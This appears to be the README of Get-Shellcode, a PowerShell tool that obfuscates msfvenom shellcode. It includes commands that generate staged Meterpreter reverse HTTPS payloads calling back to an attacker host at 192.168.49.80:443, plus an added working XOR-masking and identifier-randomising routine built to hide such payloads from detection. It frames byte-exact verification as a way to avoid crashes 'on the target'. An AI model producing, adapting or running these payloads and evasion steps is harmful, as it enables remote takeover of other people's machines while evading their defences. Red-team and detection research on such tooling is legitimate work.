Get-Shellcode
A solution to create obfuscated shellcode from msfvenom for PowerShell.
Obfuscated Msfvenom Shellcode for Powershell
Get-Shellcode is a project that stems from the Invoke-PSObfuscation framework, with the sole purpose of producing obfuscated shellcode generated from msfvenom for PowerShell payloads.
Requirements
This script was built and tested on the following versions of Kali Linux and PowerShell. The resulting payload is compatible with systems running a PowerShell version newer than 2.0. The script also relies on msfvenom being accessible on the system; it is installed by default on Kali.
┌──(kali㉿kali)-[/home/kali]
└─PS> $PSVersionTable

Name                           Value
----                           -----
PSVersion                      7.2.4
PSEdition                      Core
GitCommitId                    7.2.4
OS                             Linux 5.18.0-kali5-amd64 #1 SMP PREEMPT_DYNAMIC Debian 5.18.5-1kali6 (2022-07-07)
Platform                       Unix
PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0…}
PSRemotingProtocolVersion      2.3
SerializationVersion           1.1.0.1
WSManStackVersion              3.0
Usage Examples
To load the script on Kali Linux, open a terminal and run pwsh. With PowerShell now running in your terminal, load the script into your current session by dot-sourcing it.
┌──(kali㉿kali)-[~]
└─$ pwsh
PowerShell 7.2.4
Copyright (c) Microsoft Corporation.
https://aka.ms/powershell
Type 'help' to get help.
┌──(kali㉿kali)-[/home/kali]
└─PS> . ./Get-Shellcode.ps1
With the script loaded into our PowerShell session, we run the Get-Shellcode function to generate our payload. A payload can be generated in two ways: the default payload and a supplied payload.
Default Payload
The default payload generated by this script is a staged Meterpreter reverse HTTPS shellcode, which only requires us to pass an IP and port. The default also sets EXITFUNC to thread. These defaults are merely personal preference and can be changed with ease.
Get-Shellcode -Ip 192.168.49.80 -Port 443
Supplied Payload
The second method is the supplied payload, where we pass our own parameters through to msfvenom. Keep in mind that this solution is designed for PowerShell payloads, so you must include -f ps1. Staged payloads are significantly smaller than stageless payloads, so a stageless payload will take more time to process. If you also pass a custom payload variable name (msfvenom's -v option), it will be obfuscated as well.
Get-Shellcode -Msfvenom "-p windows/x64/meterpreter/reverse_https LHOST=192.168.49.80 LPORT=443 EXITFUNC=thread -f ps1"
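To make concrete what "obfuscating the msfvenom output" means, here is an added example that is not part of Get-Shellcode or Invoke-PSObfuscation. It takes the single line that msfvenom -f ps1 prints ([Byte[]] $buf = 0xfc,0x48,...), XOR-masks every byte with a random key, randomises the variable names, and emits a PowerShell 2.0-compatible stub that rebuilds the original byte array at run time. The function names, the hashtable of variable names and the sample input line are our own; the sample bytes are a constructed placeholder (NOP sled plus ret), not shellcode.

```powershell
# Added illustration: a minimal XOR-mask-and-rename transform over msfvenom -f ps1 output.
# Not the project's own code; function and variable names are chosen for this example.

function Get-RandomIdentifier {
    param([int]$Length = 8)
    # Letters only, so the result is always a valid PowerShell variable name.
    $alphabet = [char[]]'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
    -join (1..$Length | ForEach-Object { $alphabet | Get-Random })
}

function ConvertTo-MaskedStub {
    param(
        [Parameter(Mandatory)][string]$MsfvenomPs1,
        [byte]$Key = (Get-Random -Minimum 1 -Maximum 256)   # never 0: XOR with 0 is a no-op
    )
    # msfvenom -f ps1 prints one line: [Byte[]] $buf = 0xfc,0x48,...  (name changes with -v)
    if (-not ($MsfvenomPs1 -match '\[Byte\[\]\]\s*\$(\w+)\s*=\s*(.+)$')) {
        throw 'Input does not look like msfvenom -f ps1 output'
    }
    $bytes  = [byte[]]($Matches[2].Trim() -split ',' | ForEach-Object { [Convert]::ToByte($_.Trim(), 16) })
    $masked = $bytes | ForEach-Object { $_ -bxor $Key }
    $hex    = ($masked | ForEach-Object { '0x{0:x2}' -f $_ }) -join ','

    # Fresh random names for every symbol the stub uses (the original name, e.g. $buf, is discarded).
    $v = @{ Key = Get-RandomIdentifier; Masked = Get-RandomIdentifier; Out = Get-RandomIdentifier; I = Get-RandomIdentifier }

    # New-Object instead of [byte[]]::new() keeps the stub usable on older PowerShell versions.
    @"
`$$($v.Key) = 0x$('{0:x2}' -f $Key)
`$$($v.Masked) = [Byte[]]@($hex)
`$$($v.Out) = New-Object Byte[] `$$($v.Masked).Length
for (`$$($v.I) = 0; `$$($v.I) -lt `$$($v.Masked).Length; `$$($v.I)++) { `$$($v.Out)[`$$($v.I)] = `$$($v.Masked)[`$$($v.I)] -bxor `$$($v.Key) }
`$$($v.Out)
"@
}

function Test-MaskedStub {
    # Round-trip check: running the stub must yield exactly the bytes from the original line.
    param([string]$MsfvenomPs1, [string]$Stub)
    $expected = ($MsfvenomPs1 -replace '^.*=\s*', '') -split ',' | ForEach-Object { [Convert]::ToByte($_.Trim(), 16) }
    $decoded  = & ([scriptblock]::Create($Stub))
    ($expected -join ',') -eq ($decoded -join ',')
}

# Constructed placeholder input (NOP, NOP, NOP, RET), not real shellcode.
$sample = '[Byte[]] $buf = 0x90,0x90,0x90,0xc3'
$stub   = ConvertTo-MaskedStub -MsfvenomPs1 $sample
$stub
if (-not (Test-MaskedStub -MsfvenomPs1 $sample -Stub $stub)) { throw 'round-trip failed' }
```

Running the stub only reconstructs the byte array; nothing in it allocates memory or executes the bytes. The check matters in practice: an obfuscation pass that silently corrupts a single byte produces a payload that crashes on the target, so any transform of msfvenom output should be verified round-trip before it is shipped.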
Output to File
Get-Shellcode -Msfvenom "-p windows/x64/meterpreter/reverse_https LHOST=192.168.49.80 LPORT=443 EXITFUNC=thread -f ps1" -OutFile obfuscated.ps1